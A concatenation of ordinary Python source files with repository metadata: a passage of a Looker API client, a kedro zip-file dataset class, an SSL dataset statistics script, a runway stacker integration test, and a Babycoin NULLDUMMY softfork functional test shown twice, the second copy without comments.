response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-manifest",
title="Couldn't retrieve project manifest.",
status=response.status_code,
detail=(
f"Failed to retrieve manifest for project '{project}'. "
"Make sure you have a 'manifest.lkml' file in your project, "
"then try again."
),
response=response,
)
manifest = response.json()
return manifest
def get_active_branch(self, project: str) -> JsonDict:
"""Gets the active branch for the user in the given project.
Args:
project: Name of the Looker project to use.
Returns:
            JsonDict: JSON response describing the active branch
"""
logger.debug(f"Getting active branch for project '{project}'")
url = utils.compose_url(self.api_url, path=["projects", project, "git_branch"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-active-branch",
title="Couldn't determine active Git branch.",
status=response.status_code,
detail=(
f"Unable to get active branch for project '{project}'. "
"Please check that the project exists and that your user "
"has the correct permissions and try again."
),
response=response,
)
branch_name = response.json()["name"]
logger.debug(f"The active branch is '{branch_name}'")
return response.json()
def get_active_branch_name(self, project: str) -> str:
"""Helper method to return only the branch name."""
full_response = self.get_active_branch(project)
return full_response["name"]
def create_branch(self, project: str, branch: str, ref: Optional[str] = None):
"""Creates a branch in the given project.
Args:
project: Name of the Looker project to use.
branch: Name of the branch to create.
ref: The ref to create the branch from.
"""
body = {"name": branch}
message = f"Creating branch '{branch}' on project '{project}'"
detail = (
f"Unable to create branch '{branch}' "
f"in project '{project}'. "
"Confirm the branch doesn't already exist and try again."
)
if ref:
body["ref"] = ref
message += f" with ref '{ref}'"
detail = (
f"Unable to create branch '{branch}' "
f"in project '{project}' using ref '{ref}'. "
"Confirm the branch doesn't already exist and try again."
)
logger.debug(message)
url = utils.compose_url(self.api_url, path=["projects", project, "git_branch"])
response = self.post(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-create-branch",
title="Couldn't create new Git branch.",
status=response.status_code,
detail=detail,
response=response,
)
def hard_reset_branch(self, project: str, branch: str, ref: str):
"""Hard resets a branch to the ref prodvided.
DANGER: hard reset will be force pushed to the remote. Unsaved changes and
commits may be permanently lost.
Args:
project: Name of the Looker project to use.
branch: Name of the branch to update.
ref: The ref to update the branch from.
"""
logger.debug(
f"Hard resetting branch '{branch}' on project '{project}' to ref '{ref}'"
)
body = {"name": branch, "ref": ref}
url = utils.compose_url(self.api_url, path=["projects", project, "git_branch"])
response = self.put(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-update-branch",
title="Couldn't update Git branch.",
status=response.status_code,
detail=(
f"Unable to update branch '{branch}' "
f"in project '{project}' using ref '{ref}'. "
"Please try again."
),
response=response,
)
def delete_branch(self, project: str, branch: str):
"""Deletes a branch in the given project.
Args:
project: Name of the Looker project to use.
branch: Name of the branch to delete.
"""
logger.debug(f"Deleting branch '{branch}' in project '{project}'")
url = utils.compose_url(
self.api_url, path=["projects", project, "git_branch", branch]
)
response = self.delete(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-delete-branch",
title="Couldn't delete Git branch.",
status=response.status_code,
detail=(
f"Unable to delete branch '{branch}' "
f"in project '{project}'. Please try again."
),
response=response,
)
def all_lookml_tests(self, project: str) -> List[JsonDict]:
"""Gets all LookML/data tests for a given project.
Args:
project: Name of the Looker project to use
Returns:
List[JsonDict]: JSON response containing all LookML/data tests
"""
logger.debug(f"Getting LookML tests for project {project}")
url = utils.compose_url(
self.api_url, path=["projects", project, "lookml_tests"]
)
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-data-tests",
title="Couldn't retrieve all data tests.",
status=response.status_code,
detail=(
f"Unable to retrieve all data tests for "
f"project '{project}'. Please try again."
),
response=response,
)
return response.json()
def run_lookml_test(
        self, project: str, model: Optional[str] = None, test: Optional[str] = None
) -> List[JsonDict]:
"""Runs all LookML/data tests for a given project and model (optional)
This command only runs tests in production, as the Looker API doesn't currently
allow us to run data tests on a specific branch.
Args:
project: Name of the Looker project to use
            model: Optional name of the LookML model to restrict testing to
            test: Optional name of the LookML/data test to run
Returns:
List[JsonDict]: JSON response containing any LookML/data test errors
"""
if model is None and test is None:
logger.debug(f"Running all LookML tests for project '{project}'")
elif model is None and test is not None:
logger.debug(f"Running LookML test '{test}'")
elif model is not None and test is None:
logger.debug(f"Running all LookML tests for model '{model}'")
elif model is not None and test is not None:
logger.debug(f"Running LookML test '{test}' in model '{model}'")
url = utils.compose_url(
self.api_url, path=["projects", project, "lookml_tests", "run"]
)
params = {}
if model is not None:
params["model"] = model
if test is not None:
params["test"] = test
        response = self.get(url=url, params=params, timeout=TIMEOUT_SEC)  # use the wrapper so an expired token is refreshed first
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-run-data-test",
title="Couldn't run data test.",
status=response.status_code,
detail=(
f"Unable to run one or more data tests for "
f"project '{project}'. Please try again."
),
response=response,
)
return response.json()
def get_lookml_models(self, fields: Optional[List] = None) -> List[JsonDict]:
"""Gets all models and explores from the LookmlModel endpoint.
Returns:
List[JsonDict]: JSON response containing LookML models and explores.
"""
logger.debug(f"Getting all models and explores from {self.base_url}")
if fields is None:
fields = []
params = {}
if fields:
params["fields"] = fields
url = utils.compose_url(self.api_url, path=["lookml_models"], params=params)
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-lookml",
title="Couldn't retrieve models and explores.",
status=response.status_code,
detail="Unable to retrieve LookML details. Please try again.",
response=response,
)
return response.json()
def get_lookml_dimensions(self, model: str, explore: str) -> List[str]:
"""Gets all dimensions for an explore from the LookmlModel endpoint.
Args:
model: Name of LookML model to query.
explore: Name of LookML explore to query.
Returns:
List[str]: Names of all the dimensions in the specified explore. Dimension
names are returned in the format 'explore_name.dimension_name'.
"""
logger.debug(f"Getting all dimensions from explore {model}/{explore}")
params = {"fields": ["fields"]}
url = utils.compose_url(
self.api_url,
path=["lookml_models", model, "explores", explore],
params=params,
)
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-dimension-lookml",
title="Couldn't retrieve dimensions.",
status=response.status_code,
detail=(
"Unable to retrieve dimension LookML details "
f"for explore '{model}/{explore}'. Please try again."
),
response=response,
)
return response.json()["fields"]["dimensions"]
def create_query(
        self, model: str, explore: str, dimensions: List[str], fields: Optional[List] = None
) -> Dict:
"""Creates a Looker async query for one or more specified dimensions.
The query created is a SELECT query, selecting all dimensions specified for a
certain model and explore. Looker builds the query using the `sql` field in the
LookML for each dimension.
If a Timeout exception is received, attempts to retry.
"""
# Using old-style string formatting so that strings are formatted lazily
logger.debug(
"Creating async query for %s/%s/%s",
model,
explore,
"*" if len(dimensions) != 1 else dimensions[0],
)
body = {
"model": model,
"view": explore,
"fields": dimensions,
"limit": 0,
"filter_expression": "1=2",
}
params: Dict[str, list] = {}
if fields is None:
params["fields"] = []
else:
params["fields"] = fields
url = utils.compose_url(self.api_url, path=["queries"], params=params)
response = self.post(url=url, json=body, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-create-query",
title="Couldn't create query.",
status=response.status_code,
detail=(
f"Failed to create query for {model}/{explore}/"
f'{"*" if len(dimensions) > 1 else dimensions[0]}. '
"Please try again."
),
response=response,
)
result = response.json()
query_id = result["id"]
logger.debug(
"Query for %s/%s/%s created as query %d",
model,
explore,
"*" if len(dimensions) != 1 else dimensions[0],
query_id,
)
return result
def create_query_task(self, query_id: int) -> str:
"""Runs a previously created query asynchronously and returns the query task ID.
If a ClientError or TimeoutError is received, attempts to retry.
Args:
query_id: ID of a previously created query to run.
Returns:
str: ID for the query task, used to check on the status of the query, which
is being run asynchronously.
"""
# Using old-style string formatting so that strings are formatted lazily
logger.debug("Starting query %d", query_id)
body = {"query_id": query_id, "result_format": "json_detail"}
params = {"fields": ["id"]}
url = utils.compose_url(self.api_url, path=["query_tasks"], params=params)
response = self.post(
url=url, json=body, params={"cache": "false"}, timeout=TIMEOUT_SEC
)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-launch-query",
title="Couldn't launch query.",
status=response.status_code,
detail=(
"Failed to create query task for "
f"query '{query_id}'. Please try again."
),
response=response,
)
result = response.json()
query_task_id = result["id"]
logger.debug("Query %d is running under query task %s", query_id, query_task_id)
return query_task_id
def get_query_task_multi_results(self, query_task_ids: List[str]) -> JsonDict:
"""Returns query task results.
If a ClientError or TimeoutError is received, attempts to retry.
Args:
query_task_ids: IDs for the query tasks running asynchronously.
Returns:
            JsonDict: JSON response mapping each query task ID to its result
"""
# Using old-style string formatting so that strings are formatted lazily
logger.debug(
"Attempting to get results for %d query tasks", len(query_task_ids)
)
url = utils.compose_url(self.api_url, path=["query_tasks", "multi_results"])
response = self.get(
url=url,
params={"query_task_ids": ",".join(query_task_ids)},
timeout=TIMEOUT_SEC,
)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-query-results",
title="Couldn't get results for the specified query tasks.",
status=response.status_code,
detail=(
"Failed to get the results for "
f"{len(query_task_ids)} query tasks. "
"Please try again."
),
response=response,
)
result = response.json()
return result
def cancel_query_task(self, query_task_id: str):
"""Cancels a query task.
Args:
query_task_id: ID for the query task to cancel.
"""
logger.debug(f"Cancelling query task: {query_task_id}")
url = utils.compose_url(self.api_url, path=["running_queries", query_task_id])
self.delete(url=url, timeout=TIMEOUT_SEC)
# No raise_for_status() here because Looker API seems to give a 404
# if you try to cancel a finished query which can happen as part of cleanup
def content_validation(self) -> JsonDict:
logger.debug("Validating all content in Looker")
url = utils.compose_url(self.api_url, path=["content_validation"])
response = self.get(
url=url, timeout=3600
) # 1 hour timeout for content validation
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-validate-content",
title="Couldn't validate Looks and Dashboards.",
status=response.status_code,
detail=("Failed to run the content validator. Please try again."),
response=response,
)
result = response.json()
return result
def lookml_validation(self, project) -> JsonDict:
logger.debug(f"Validating LookML for project '{project}'")
url = utils.compose_url(self.api_url, path=["projects", project, "validate"])
response = self.post(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-validate-lookml",
title=f"Couldn't validate LookML in project {project}.",
status=response.status_code,
detail=("Failed to run the LookML validator. Please try again."),
response=response,
)
result = response.json()
return result
def cached_lookml_validation(self, project) -> Optional[JsonDict]:
logger.debug(f"Getting cached LookML validation results for '{project}'")
url = utils.compose_url(self.api_url, path=["projects", project, "validate"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-cached-lookml-validation",
title=f"Couldn't get cached LookML validation results in project '{project}'.",
status=response.status_code,
detail=(
"Failed to get cached LookML valiation results. Please try again."
),
response=response,
)
# If no cached validation results are available, Looker returns a 204 No Content.
# The response has no payload. We should return None in this case and handle accordingly.
if response.status_code == 204:
return None
result = response.json()
return result
def all_folders(self) -> List[JsonDict]:
logger.debug("Getting information about all folders")
url = utils.compose_url(self.api_url, path=["folders"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError:
raise LookerApiError(
name="unable-to-get-folders",
title="Couldn't obtain project folders.",
status=response.status_code,
detail=("Failed to get all folders."),
response=response,
)
result = response.json()
return result
@backoff.on_exception(backoff.expo, (Timeout,), max_tries=2)
def run_query(self, query_id: int) -> str:
"""Returns the compiled SQL for a given query ID.
The corresponding Looker API endpoint allows us to run queries with a variety
of result formats, however we only use the `sql` result format, which doesn't
run the query but does return its compiled SQL.
If a Timeout exception is received, attempts to retry.
"""
# Using old-style string formatting so that strings are formatted lazily
logger.debug("Retrieving the SQL for query ID %s", query_id)
url = utils.compose_url(self.api_url, path=["queries", query_id, "run", "sql"])
response = self.get(url=url, timeout=TIMEOUT_SEC)
try:
response.raise_for_status()
except requests.exceptions.HTTPError as e:
if e.response.status_code == 404:
return (
"-- SQL could not be generated because of errors with this query."
)
else:
raise LookerApiError(
name="unable-to-retrieve-compiled-sql",
title="Couldn't retrieve compiled SQL.",
status=response.status_code,
detail=(
f"Failed to retrieve compiled SQL for query '{query_id}'. "
"Please try again."
),
response=response,
)
result = response.text
return result
class NullAuth(requests.auth.AuthBase):
"""A custom auth class which ensures requests does not override authorization
headers with netrc file credentials if present.
"""
def __call__(self, r):
return r
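# A minimal usage sketch (editor's addition, not part of the original module):
# drives the LookerClient defined above through a typical validation flow.
# The instance URL, credentials, project, and branch names are hypothetical
# placeholders, not values taken from this source.
if __name__ == "__main__":
    import os
    client = LookerClient(
        base_url=os.environ.get("LOOKER_BASE_URL", "https://example.cloud.looker.com"),
        client_id=os.environ.get("LOOKER_CLIENT_ID", ""),
        client_secret=os.environ.get("LOOKER_CLIENT_SECRET", ""),
    )
    # Switch the API session to the dev workspace and check out a feature
    # branch before running the project's data tests (names are hypothetical).
    client.update_workspace("dev")
    client.checkout_branch(project="my_project", branch="feature/my-branch")
    results = client.run_lookml_test(project="my_project")
    logger.info(f"Data test results: {results}")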
1c40df65ea2fe64264af604bda94e41779bcdeb6 | 4703 | py | Python | de1/zip/zip_file_data_set.py | samhiscoxqb/de1-python @ 19b8fc6945cf0cd413ef79ff39a65451eea9e627 | ["MIT"] | stars: 10 (2021-02-01 to 2021-11-18) | issues: 2 (2021-02-01 to 2021-02-05) | forks: 1 (2021-02-05)
import os
import tempfile
from copy import deepcopy
from typing import Any, Dict, List, Optional, Type, Union
from warnings import warn
from kedro.io import AbstractDataSet, DataSetError
from kedro.io.core import parse_dataset_definition, VERSION_KEY, VERSIONED_FLAG_KEY
class ZipFileDataSet(AbstractDataSet):
"""
ZipFileDataSet decompresses and extracts files from zip files.
    Loads a single file from inside the archive via an underlying dataset,
    with several options for filtering which member file is selected.
"""
DEFAULT_DATASET = {
"type": "text.TextDataSet",
"fs_args": {
"open_args_load": {
"mode": "rb",
}
}
}
def __init__(
self,
filepath: str,
        zipped_filename: Optional[str] = None,
        zipped_filename_suffix: Optional[str] = None,
        ignored_prefixes: Optional[List[str]] = None,
        ignored_suffixes: Optional[List[str]] = None,
        credentials: Optional[Dict[str, str]] = None,
dataset: Optional[Union[str, Type[AbstractDataSet], Dict[str, Any]]] = None,
filepath_arg: str = 'filepath',
):
if dataset is None:
dataset = ZipFileDataSet.DEFAULT_DATASET
dataset = dataset if isinstance(dataset, dict) else {"type": dataset}
self._dataset_type, self._dataset_config = parse_dataset_definition(dataset)
if VERSION_KEY in self._dataset_config:
raise DataSetError(
"`{}` does not support versioning of the underlying dataset. "
"Please remove `{}` flag from the dataset definition.".format(
self.__class__.__name__, VERSIONED_FLAG_KEY
)
)
self._filepath_arg = filepath_arg
if self._filepath_arg in self._dataset_config:
warn(
"`{}` key must not be specified in the dataset definition as it "
"will be overwritten by partition path".format(self._filepath_arg)
)
self._filepath = filepath
self._zipped_filename = zipped_filename
self._zipped_filename_suffix = zipped_filename_suffix
self._ignored_prefixes = ignored_prefixes or ['_', '.']
self._ignored_suffixes = (ignored_suffixes or []) + ['/']
credentials = credentials or {}
        password = credentials.get('password', credentials.get('pwd'))
        # ZipFile.open() requires the password as bytes, not str
        self._password = password.encode() if isinstance(password, str) else password
def _is_ignored(self, name):
for ignored_prefix in self._ignored_prefixes:
if name.startswith(ignored_prefix):
return True
for ignored_suffix in self._ignored_suffixes:
if name.endswith(ignored_suffix):
return True
return False
    def _load(self) -> Any:
import zipfile
with zipfile.ZipFile(self._filepath) as zipped:
namelist = zipped.namelist()
if self._zipped_filename_suffix is not None:
namelist = [
name for name in namelist if name.lower().endswith(self._zipped_filename_suffix)
]
namelist = [
name
for name in namelist if not self._is_ignored(name)
]
if len(namelist) > 1 and self._zipped_filename is None:
raise DataSetError(f'Multiple files found! Please specify which file to extract: {namelist}')
if len(namelist) <= 0:
                raise DataSetError('No files found in the archive!')
target_filename = namelist[0]
if self._zipped_filename is not None:
target_filename = self._zipped_filename
with zipped.open(target_filename, pwd=self._password) as zipped_file:
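                # Extract the selected member to a temporary file on disk, then
                # delegate parsing to the wrapped dataset type by pointing its
                # filepath argument at that temp file. Note that only the temp
                # file is removed afterwards; the temp directory is left behind.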
temp_unzipped_dir = tempfile.mkdtemp()
temp_unzipped_filepath = os.path.join(temp_unzipped_dir, "temp_file")
with open(temp_unzipped_filepath, "wb") as temp_unzipped_file:
temp_unzipped_file.write(zipped_file.read())
kwargs = deepcopy(self._dataset_config)
kwargs[self._filepath_arg] = temp_unzipped_filepath
dataset = self._dataset_type(**kwargs)
data = dataset.load()
os.remove(temp_unzipped_filepath)
return data
def _save(self, data: Any) -> None:
        raise DataSetError('Saving is unsupported')
def _describe(self) -> Dict[str, Any]:
return dict(
filepath=self._filepath,
zipped_filename=self._zipped_filename,
zipped_filename_suffix=self._zipped_filename_suffix,
ignored_prefixes=self._ignored_prefixes,
            ignored_suffixes=self._ignored_suffixes,
)
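# A minimal usage sketch (editor's addition, not part of the original module):
# selects a single CSV member from a zip archive using the default wrapped
# dataset (text.TextDataSet in binary mode). The archive path below is a
# hypothetical placeholder, not a value taken from this source.
if __name__ == "__main__":
    example = ZipFileDataSet(
        filepath="data/01_raw/archive.zip",  # hypothetical archive path
        zipped_filename_suffix=".csv",       # keep only CSV members
    )
    print(example._describe())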
1c40dfe67753933f27df222980954730939aa54c | 1380 | py | Python | test_dataset.py | yanzhicong/realistic-ssl-evaluation-pytorch @ d0ea3349765f8642e97dce57cf319f703b7f1e42 | ["MIT"] | stars: null | issues: null | forks: null
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy as np
import argparse
from config import config
import vis
parser = argparse.ArgumentParser()
parser.add_argument("--dataset", "-d", default="cifar10", type=str, help="dataset name : [svhn, cifar10]")
parser.add_argument("--root", "-r", default="data", type=str, help="dataset dir")
parser.add_argument("--poison-data-ratio", default=0.0, type=float)
args = parser.parse_args()
plotter = vis.Plotter()
print("dataset : {}".format(args.dataset))
dataset_cfg = config[args.dataset]
l_train_dataset = dataset_cfg["dataset"](args.root, "l_train")
u_train_dataset = dataset_cfg["dataset"](args.root, "u_train")
images = l_train_dataset.dataset['images']
labels = l_train_dataset.dataset['labels']
print(images.shape, images.dtype, np.max(images), np.min(images))
print(labels.shape, labels.dtype, np.unique(labels), np.max(labels), np.min(labels))
for c in np.unique(labels):
print("\t{} : {}".format(c, np.sum(labels == c)))
images = u_train_dataset.dataset['images']
labels = u_train_dataset.dataset['labels']
print(images.shape, images.dtype, np.max(images), np.min(images))
print(labels.shape, labels.dtype, np.unique(labels), np.max(labels), np.min(labels))
for c in np.unique(labels):
print("\t{} : {}".format(c, np.sum(labels == c)))
1c40dfec119082283f869d943aa79be46c787106 | 1233 | py | Python | integration_tests/test_commands/tests/test_stacker.py | troyready/runway @ 4fd299961a4b73df39e14f4f19a7236f7be17dd8 | ["Apache-2.0"] | stars: null | issues: null | forks: null
"""Test deploying stacker."""
# pylint: disable=no-self-use
import os
from subprocess import check_output
import boto3
from integration_tests.test_commands.test_commands import Commands
KEY = "/runway/integration-test/stacker"
VALUE = "foo"
class TestRunStacker(Commands):
"""Tests run-stacker subcommand."""
TEST_NAME = __name__
def get_stack_path(self):
"""Get the stacker test path."""
return os.path.join(
os.path.dirname(os.path.dirname(__file__)), "fixtures", "stacker"
)
def init(self):
"""Initialize test."""
def run(self):
"""Run tests."""
path = self.get_stack_path()
check_output(
["runway", "run-stacker", "--", "build", "stack.yaml"], cwd=path
).decode()
client = boto3.client("ssm", region_name=self.environment["AWS_DEFAULT_REGION"])
parameter = client.get_parameter(Name=KEY)
assert parameter["Parameter"]["Value"] == VALUE
def teardown(self):
"""Teardown any created resources."""
path = self.get_stack_path()
check_output(
["runway", "run-stacker", "--", "destroy", "stack.yaml", "--force"],
cwd=path,
).decode()
1c40e0c8d7f2d926101325d5f768f04f96b4f6f0 | 6474 | py | Python | test/functional/nulldummy.py | hendry19901990/babycoin @ c973192d7e877249b0c58127f10ea95083309993 | ["MIT"] | stars: null | issues: null | forks: null
#!/usr/bin/env python3
# Copyright (c) 2016 The Babycoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test NULLDUMMY softfork.
Connect to a single node.
Generate 2 blocks (save the coinbases for later).
Generate 427 more blocks.
[Policy/Consensus] Check that NULLDUMMY compliant transactions are accepted in the 430th block.
[Policy] Check that non-NULLDUMMY transactions are rejected before activation.
[Consensus] Check that the new NULLDUMMY rules are not enforced on the 431st block.
[Policy/Consensus] Check that the new NULLDUMMY rules are enforced on the 432nd block.
"""
from test_framework.test_framework import BabycoinTestFramework
from test_framework.util import *
from test_framework.mininode import CTransaction, NetworkThread
from test_framework.blocktools import create_coinbase, create_block, add_witness_commitment
from test_framework.script import CScript
from io import BytesIO
import time
NULLDUMMY_ERROR = "64: non-mandatory-script-verify-flag (Dummy CHECKMULTISIG argument must be zero)"
def trueDummy(tx):
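    # Replace the NULLDUMMY element (the empty byte vector consumed by
    # OP_CHECKMULTISIG) with OP_1 (0x51), producing a non-NULLDUMMY scriptSig.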
scriptSig = CScript(tx.vin[0].scriptSig)
newscript = []
for i in scriptSig:
if (len(newscript) == 0):
assert(len(i) == 0)
newscript.append(b'\x51')
else:
newscript.append(i)
tx.vin[0].scriptSig = CScript(newscript)
tx.rehash()
class NULLDUMMYTest(BabycoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [['-whitelist=127.0.0.1', '-walletprematurewitness']]
def run_test(self):
self.address = self.nodes[0].getnewaddress()
self.ms_address = self.nodes[0].addmultisigaddress(1,[self.address])
self.wit_address = self.nodes[0].addwitnessaddress(self.address)
self.wit_ms_address = self.nodes[0].addwitnessaddress(self.ms_address)
NetworkThread().start() # Start up network handling in another thread
self.coinbase_blocks = self.nodes[0].generate(2) # Block 2
coinbase_txid = []
for i in self.coinbase_blocks:
coinbase_txid.append(self.nodes[0].getblock(i)['tx'][0])
self.nodes[0].generate(427) # Block 429
self.lastblockhash = self.nodes[0].getbestblockhash()
self.tip = int("0x" + self.lastblockhash, 0)
self.lastblockheight = 429
self.lastblocktime = int(time.time()) + 429
self.log.info("Test 1: NULLDUMMY compliant base transactions should be accepted to mempool and mined before activation [430]")
test1txs = [self.create_transaction(self.nodes[0], coinbase_txid[0], self.ms_address, 49)]
txid1 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[0].serialize_with_witness()), True)
test1txs.append(self.create_transaction(self.nodes[0], txid1, self.ms_address, 48))
txid2 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[1].serialize_with_witness()), True)
test1txs.append(self.create_transaction(self.nodes[0], coinbase_txid[1], self.wit_ms_address, 49))
txid3 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[2].serialize_with_witness()), True)
self.block_submit(self.nodes[0], test1txs, False, True)
self.log.info("Test 2: Non-NULLDUMMY base multisig transaction should not be accepted to mempool before activation")
test2tx = self.create_transaction(self.nodes[0], txid2, self.ms_address, 47)
trueDummy(test2tx)
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test2tx.serialize_with_witness()), True)
self.log.info("Test 3: Non-NULLDUMMY base transactions should be accepted in a block before activation [431]")
self.block_submit(self.nodes[0], [test2tx], False, True)
self.log.info("Test 4: Non-NULLDUMMY base multisig transaction is invalid after activation")
test4tx = self.create_transaction(self.nodes[0], test2tx.hash, self.address, 46)
test6txs=[CTransaction(test4tx)]
trueDummy(test4tx)
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test4tx.serialize_with_witness()), True)
self.block_submit(self.nodes[0], [test4tx])
self.log.info("Test 5: Non-NULLDUMMY P2WSH multisig transaction invalid after activation")
test5tx = self.create_transaction(self.nodes[0], txid3, self.wit_address, 48)
test6txs.append(CTransaction(test5tx))
test5tx.wit.vtxinwit[0].scriptWitness.stack[0] = b'\x01'
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test5tx.serialize_with_witness()), True)
self.block_submit(self.nodes[0], [test5tx], True)
self.log.info("Test 6: NULLDUMMY compliant base/witness transactions should be accepted to mempool and in block after activation [432]")
for i in test6txs:
self.nodes[0].sendrawtransaction(bytes_to_hex_str(i.serialize_with_witness()), True)
self.block_submit(self.nodes[0], test6txs, True, True)
def create_transaction(self, node, txid, to_address, amount):
inputs = [{ "txid" : txid, "vout" : 0}]
outputs = { to_address : amount }
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
tx = CTransaction()
f = BytesIO(hex_str_to_bytes(signresult['hex']))
tx.deserialize(f)
return tx
def block_submit(self, node, txs, witness = False, accept = False):
block = create_block(self.tip, create_coinbase(self.lastblockheight + 1), self.lastblocktime + 1)
block.nVersion = 4
for tx in txs:
tx.rehash()
block.vtx.append(tx)
block.hashMerkleRoot = block.calc_merkle_root()
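        # short-circuit: only add the witness commitment when witness=True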
witness and add_witness_commitment(block)
block.rehash()
block.solve()
node.submitblock(bytes_to_hex_str(block.serialize(True)))
if (accept):
assert_equal(node.getbestblockhash(), block.hash)
self.tip = block.sha256
self.lastblockhash = block.hash
self.lastblocktime += 1
self.lastblockheight += 1
else:
assert_equal(node.getbestblockhash(), self.lastblockhash)
if __name__ == '__main__':
NULLDUMMYTest().main()
| 49.045455
| 145
| 0.701267
|
from test_framework.test_framework import BabycoinTestFramework
from test_framework.util import *
from test_framework.mininode import CTransaction, NetworkThread
from test_framework.blocktools import create_coinbase, create_block, add_witness_commitment
from test_framework.script import CScript
from io import BytesIO
import time
NULLDUMMY_ERROR = "64: non-mandatory-script-verify-flag (Dummy CHECKMULTISIG argument must be zero)"
def trueDummy(tx):
scriptSig = CScript(tx.vin[0].scriptSig)
newscript = []
for i in scriptSig:
if (len(newscript) == 0):
assert(len(i) == 0)
newscript.append(b'\x51')
else:
newscript.append(i)
tx.vin[0].scriptSig = CScript(newscript)
tx.rehash()
class NULLDUMMYTest(BabycoinTestFramework):
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.extra_args = [['-whitelist=127.0.0.1', '-walletprematurewitness']]
def run_test(self):
self.address = self.nodes[0].getnewaddress()
self.ms_address = self.nodes[0].addmultisigaddress(1,[self.address])
self.wit_address = self.nodes[0].addwitnessaddress(self.address)
self.wit_ms_address = self.nodes[0].addwitnessaddress(self.ms_address)
NetworkThread().start()
self.coinbase_blocks = self.nodes[0].generate(2)
coinbase_txid = []
for i in self.coinbase_blocks:
coinbase_txid.append(self.nodes[0].getblock(i)['tx'][0])
self.nodes[0].generate(427)
self.lastblockhash = self.nodes[0].getbestblockhash()
self.tip = int("0x" + self.lastblockhash, 0)
self.lastblockheight = 429
self.lastblocktime = int(time.time()) + 429
self.log.info("Test 1: NULLDUMMY compliant base transactions should be accepted to mempool and mined before activation [430]")
test1txs = [self.create_transaction(self.nodes[0], coinbase_txid[0], self.ms_address, 49)]
txid1 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[0].serialize_with_witness()), True)
test1txs.append(self.create_transaction(self.nodes[0], txid1, self.ms_address, 48))
txid2 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[1].serialize_with_witness()), True)
test1txs.append(self.create_transaction(self.nodes[0], coinbase_txid[1], self.wit_ms_address, 49))
txid3 = self.nodes[0].sendrawtransaction(bytes_to_hex_str(test1txs[2].serialize_with_witness()), True)
self.block_submit(self.nodes[0], test1txs, False, True)
self.log.info("Test 2: Non-NULLDUMMY base multisig transaction should not be accepted to mempool before activation")
test2tx = self.create_transaction(self.nodes[0], txid2, self.ms_address, 47)
trueDummy(test2tx)
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test2tx.serialize_with_witness()), True)
self.log.info("Test 3: Non-NULLDUMMY base transactions should be accepted in a block before activation [431]")
self.block_submit(self.nodes[0], [test2tx], False, True)
self.log.info("Test 4: Non-NULLDUMMY base multisig transaction is invalid after activation")
test4tx = self.create_transaction(self.nodes[0], test2tx.hash, self.address, 46)
test6txs=[CTransaction(test4tx)]
trueDummy(test4tx)
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test4tx.serialize_with_witness()), True)
self.block_submit(self.nodes[0], [test4tx])
self.log.info("Test 5: Non-NULLDUMMY P2WSH multisig transaction invalid after activation")
test5tx = self.create_transaction(self.nodes[0], txid3, self.wit_address, 48)
test6txs.append(CTransaction(test5tx))
test5tx.wit.vtxinwit[0].scriptWitness.stack[0] = b'\x01'
assert_raises_rpc_error(-26, NULLDUMMY_ERROR, self.nodes[0].sendrawtransaction, bytes_to_hex_str(test5tx.serialize_with_witness()), True)
self.block_submit(self.nodes[0], [test5tx], True)
self.log.info("Test 6: NULLDUMMY compliant base/witness transactions should be accepted to mempool and in block after activation [432]")
for i in test6txs:
self.nodes[0].sendrawtransaction(bytes_to_hex_str(i.serialize_with_witness()), True)
self.block_submit(self.nodes[0], test6txs, True, True)
